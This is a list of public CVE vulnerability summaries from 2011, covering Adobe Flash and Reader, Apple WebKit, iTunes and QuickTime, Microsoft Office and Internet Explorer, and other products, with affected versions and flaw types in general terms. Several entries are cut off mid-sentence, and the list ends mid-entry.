[CVE-2011-0655] Microsoft PowerPoint 2007 SP2 and 2010 [CVE-2011-0653] Cross-site scripting (XSS) vulnerability in Microsoft Office SharePoint Server 2010 Gold and SP1, and SharePoint Foundation 2010, allows remote attackers to inject arbitrary web script or HTML via the URI, aka "XSS in SharePoint Calendar Vulnerability." [CVE-2011-0647] The irccd.exe service in EMC Replication Manager Client before 5.3 and NetWorker Module for Microsoft Applications 2.1.x and 2.2.x allows remote attackers to execute arbitrary commands via the RunProgram function to TCP port 6542. [CVE-2011-0628] Integer overflow in Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows remote attackers to execute arbitrary code via ActionScript that improperly handles a long array object. [CVE-2011-0626] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors, related to a "bounds checking" issue, a different vulnerability than CVE-2011-0623, CVE-2011-0624, and CVE-2011-0625. [CVE-2011-0625] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors, related to a "bounds checking" issue, a different vulnerability than CVE-2011-0623, CVE-2011-0624, and CVE-2011-0626. [CVE-2011-0624] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors, related to a "bounds checking" issue, a different vulnerability than CVE-2011-0623, CVE-2011-0625, and CVE-2011-0626. [CVE-2011-0623] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors, related to a "bounds checking" issue, a different vulnerability than CVE-2011-0624, CVE-2011-0625, and CVE-2011-0626. [CVE-2011-0622] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0619, CVE-2011-0620, and CVE-2011-0621. [CVE-2011-0621] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0619, CVE-2011-0620, and CVE-2011-0622. [CVE-2011-0620] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0619, CVE-2011-0621, and CVE-2011-0622. [CVE-2011-0619] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0620, CVE-2011-0621, and CVE-2011-0622. [CVE-2011-0618] Integer overflow in Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to execute arbitrary code via unspecified vectors. [CVE-2011-0611] Adobe Flash Player before 10.2.154.27 on Windows, Mac OS X, Linux, and Solaris and 10.2.156.12 and earlier on Android [CVE-2011-0610] The CoolType library in Adobe Reader 9.x before 9.4.4 and 10.x through 10.0.1 on Windows, Adobe Reader 9.x before 9.4.4 and 10.x before 10.0.3 on Mac OS X, and Adobe Acrobat 9.x before 9.4.4 and 10.x before 10.0.3 on Windows and Mac OS X allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors. [CVE-2011-0609] Unspecified vulnerability in Adobe Flash Player 10.2.154.13 and earlier on Windows, Mac OS X, Linux, and Solaris [CVE-2011-0606] Stack-based buffer overflow in rt3d.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors related to a crafted length value, a different vulnerability than CVE-2011-0563 and CVE-2011-0589. [CVE-2011-0604] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0587. [CVE-2011-0603] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image, a different vulnerability than CVE-2011-0566 and CVE-2011-0567. [CVE-2011-0602] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via crafted JP2K record types in a JPEG2000 image in a PDF file, which causes heap corruption, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0599. [CVE-2011-0600] The U3D component in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a 3D file with an invalid Parent Node count that triggers an incorrect size calculation and memory corruption, a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0592, CVE-2011-0593, and CVE-2011-0595. [CVE-2011-0599] The Bitmap parsing component in rt3d.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted image that causes an invalid pointer calculation related to 4/8-bit RLE compression, a different vulnerability than CVE-2011-0596, CVE-2011-0598, and CVE-2011-0602. [CVE-2011-0598] Integer overflow in ACE.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to execute arbitrary code via crafted ICC data, a different vulnerability than CVE-2011-0596, CVE-2011-0599, and CVE-2011-0602. [CVE-2011-0596] The Bitmap parsing component in 2d.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via an image with crafted (1) height and (2) width values for an RLE_8 compressed bitmap, which triggers a heap-based buffer overflow, a different vulnerability than CVE-2011-0598, CVE-2011-0599, and CVE-2011-0602. [CVE-2011-0595] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0592, CVE-2011-0593, and CVE-2011-0600. [CVE-2011-0594] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a font. [CVE-2011-0593] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0592, CVE-2011-0595, and CVE-2011-0600. [CVE-2011-0592] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, related to "Texture bmp," a different vulnerability than CVE-2011-0590, CVE-2011-0591, CVE-2011-0593, CVE-2011-0595, and CVE-2011-0600. [CVE-2011-0591] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a crafted Universal 3D (U3D) file that triggers a buffer overflow during decompression, related to Texture and rgba, a different vulnerability than CVE-2011-0590, CVE-2011-0592, CVE-2011-0593, CVE-2011-0595, and CVE-2011-0600. [CVE-2011-0590] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code via a 3D file, a different vulnerability than CVE-2011-0591, CVE-2011-0592, CVE-2011-0593, CVE-2011-0595, and CVE-2011-0600. [CVE-2011-0589] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0563 and CVE-2011-0606. [CVE-2011-0588] Untrusted search path vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, a different vulnerability than CVE-2011-0562 and CVE-2011-0570. [CVE-2011-0587] Cross-site scripting (XSS) vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, a different vulnerability than CVE-2011-0604. [CVE-2011-0586] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X do not properly validate unspecified input data, which allows attackers to execute arbitrary code via unknown vectors. [CVE-2011-0585] Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0565. [CVE-2011-0579] Adobe Flash Player before 10.3.181.14 on Windows, Mac OS X, Linux, and Solaris and before 10.3.185.21 on Android allows attackers to obtain sensitive information via unspecified vectors. [CVE-2011-0570] Untrusted search path vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, a different vulnerability than CVE-2011-0562 and CVE-2011-0588. [CVE-2011-0567] AcroRd32.dll in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image that triggers an incorrect pointer calculation, leading to heap memory corruption, a different vulnerability than CVE-2011-0566 and CVE-2011-0603. [CVE-2011-0566] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted image, a different vulnerability than CVE-2011-0567 and CVE-2011-0603. [CVE-2011-0565] Unspecified vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allows attackers to cause a denial of service or possibly execute arbitrary code via unknown vectors, a different vulnerability than CVE-2011-0585. [CVE-2011-0564] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows use weak permissions for unspecified files, which allows attackers to gain privileges via unknown vectors. [CVE-2011-0563] Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows and Mac OS X allow attackers to execute arbitrary code or cause a denial of service (memory corruption) via unspecified vectors, a different vulnerability than CVE-2011-0589 and CVE-2011-0606. [CVE-2011-0562] Untrusted search path vulnerability in Adobe Reader and Acrobat 10.x before 10.0.1, 9.x before 9.4.2, and 8.x before 8.2.6 on Windows allows local users to gain privileges via a Trojan horse DLL in the current working directory, a different vulnerability than CVE-2011-0570 and CVE-2011-0588. [CVE-2011-0537] Multiple directory traversal vulnerabilities in (1) languages/Language.php and (2) includes/StubObject.php in MediaWiki 1.8.0 and other versions before 1.16.2, when running on Windows and possibly Novell Netware, allow remote attackers to include and execute arbitrary local PHP files via vectors related to a crafted language file and the Language::factory function. [CVE-2011-0450] The downloads manager in Opera before 11.01 on Windows does not properly determine the pathname of the filesystem-viewing application, which allows user-assisted remote attackers to execute arbitrary code via a crafted web site that hosts an executable file. [CVE-2011-0346] Use-after-free vulnerability in the ReleaseInterface function in MSHTML.DLL in Microsoft Internet Explorer 6, 7, and 8 allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via vectors related to the DOM implementation and the BreakAASpecial and BreakCircularMemoryReferences functions, as demonstrated by cross_fuzz, aka "MSHTML Memory Corruption Vulnerability." [CVE-2011-0290] The BlackBerry Collaboration Service in Research In Motion (RIM) BlackBerry Enterprise Server (BES) 5.0.3 through MR4 for Microsoft Exchange and Lotus Domino allows remote authenticated users to log into arbitrary user accounts associated with the same organization, and send messages, read messages, read contact lists, or cause a denial of service (login unavailability), via unspecified vectors. [CVE-2011-0258] Apple QuickTime before 7.7 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted image description associated with an mp4v tag in a movie file. [CVE-2011-0248] Stack-based buffer overflow in the QuickTime ActiveX control in Apple QuickTime before 7.7 on Windows, when Internet Explorer is used, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted QTL file. [CVE-2011-0247] Multiple stack-based buffer overflows in Apple QuickTime before 7.7 on Windows allow remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted H.264 movie. [CVE-2011-0246] Heap-based buffer overflow in Apple QuickTime before 7.7 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted GIF file. [CVE-2011-0215] ImageIO in Apple Safari before 5.0.6 on Windows does not properly address re-entrancy issues, which allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TIFF file. [CVE-2011-0214] CFNetwork in Apple Safari before 5.0.6 on Windows does not properly handle an untrusted attribute of a system root certificate, which allows remote web servers to bypass intended SSL restrictions via a certificate signed by a blacklisted certification authority. [CVE-2011-0208] QuickLook in Apple Mac OS X 10.6 before 10.6.8 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted Microsoft Office document. [CVE-2011-0192] Buffer overflow in Fax4Decode in LibTIFF 3.9.4 and possibly other versions, as used in ImageIO in Apple iTunes before 10.2 on Windows and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TIFF Internet Fax image file that has been compressed using CCITT Group 4 encoding, related to the EXPAND2D macro in libtiff/tif_fax3.h. NOTE: some of these details are obtained from third party information. [CVE-2011-0191] Buffer overflow in LibTIFF 3.9.4 and possibly other versions, as used in ImageIO in Apple iTunes before 10.2 on Windows and other products, allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted TIFF image with JPEG encoding. [CVE-2011-0170] Heap-based buffer overflow in ImageIO in CoreGraphics in Apple iTunes before 10.2 on Windows allows remote attackers to execute arbitrary code or cause a denial of service (application crash) via a crafted International Color Consortium (ICC) profile in a JPEG image. [CVE-2011-0168] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0167] The windows functionality in WebKit in Apple Safari before 5.0.4 allows remote attackers to bypass the Same Origin Policy, and force the upload of arbitrary local files from a client computer, via a crafted web site. [CVE-2011-0165] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0164] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0156] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0155] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0154] WebKit, as used in Apple iTunes before 10.2 on Windows and Apple iOS, does not properly implement the .sort function for JavaScript arrays, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0153] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0152] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0151] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0150] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0149] WebKit, as used in Apple iTunes before 10.2 on Windows, does not properly parse HTML elements associated with document namespaces, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to a "dangling pointer" and iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0148] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0147] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0146] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0145] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0144] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0143] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0142] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0141] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0140] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0139] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0138] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0137] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0136] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0135] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0134] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0133] WebKit, as used in Apple iTunes before 10.2 on Windows, does not properly access glyph data during layout actions for floating blocks associated with pseudo-elements, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0132] Use-after-free vulnerability in the Runin box functionality in the Cascading Style Sheets (CSS) 2.1 Visual Formatting Model implementation in WebKit, as used in Apple iTunes before 10.2 on Windows and Apple Safari, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0131] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0130] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0129] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0128] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0127] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0126] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0125] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0124] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0123] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0122] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0121] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0120] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0119] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0118] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0117] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0116] Use-after-free vulnerability in the setOuterText method in the htmlelement library in WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to DOM manipulations during iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0115] The DOM level 2 implementation in WebKit, as used in Apple iTunes before 10.2 on Windows and Apple Safari, does not properly handle DOM manipulations associated with event listeners during processing of range objects, which allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0114] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0113] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0112] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0111] WebKit, as used in Apple iTunes before 10.2 on Windows, allows man-in-the-middle attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via vectors related to iTunes Store browsing, a different vulnerability than other CVEs listed in APPLE-SA-2011-03-02-1. [CVE-2011-0107] Untrusted search path vulnerability in Microsoft Office XP SP3, Office 2003 SP3, and Office 2007 SP2 allows local users to gain privileges via a Trojan horse DLL in the current working directory, as demonstrated by a directory that contains a .docx file, aka "Office Component Insecure Library Loading Vulnerability." [CVE-2011-0105] Microsoft Excel 2002 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac obtain a certain length value from an uninitialized memory location, which allows remote attackers to trigger a buffer overflow and execute arbitrary code via a crafted Excel file, aka "Excel Data Initialization Vulnerability." [CVE-2011-0104] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted HLink record in an Excel file, aka "Excel Buffer Overwrite Vulnerability." [CVE-2011-0103] Microsoft Excel 2002 SP3 and 2003 SP3, Office 2004 and 2008 for Mac, and Open XML File Format Converter for Mac allow remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via crafted record information in an Excel file, aka "Excel Memory Corruption Vulnerability." [CVE-2011-0101] Microsoft Excel 2002 SP3 allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption) via a crafted RealTimeData record, related to a stTopic field, doubly-byte characters, and an incorrect pointer calculation, aka "Excel Record Parsing WriteAV Vulnerability." [CVE-2011-0098] Integer signedness error in Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0097] Integer underflow in Microsoft Excel 2002 SP3, 2003 SP3, 2007 SP2, and 2010 [CVE-2011-0094] Use-after-free vulnerability in Microsoft Internet Explorer 6 and 7 allows remote attackers to execute arbitrary code by accessing an object that (1) was not properly initialized or (2) is deleted, aka "Layouts Handling Memory Corruption Vulnerability." [CVE-2011-0093] ELEMENTS.DLL in Microsoft Visio 2002 SP2, 2003 SP3, and 2007 SP2 does not properly parse structures during the opening of a 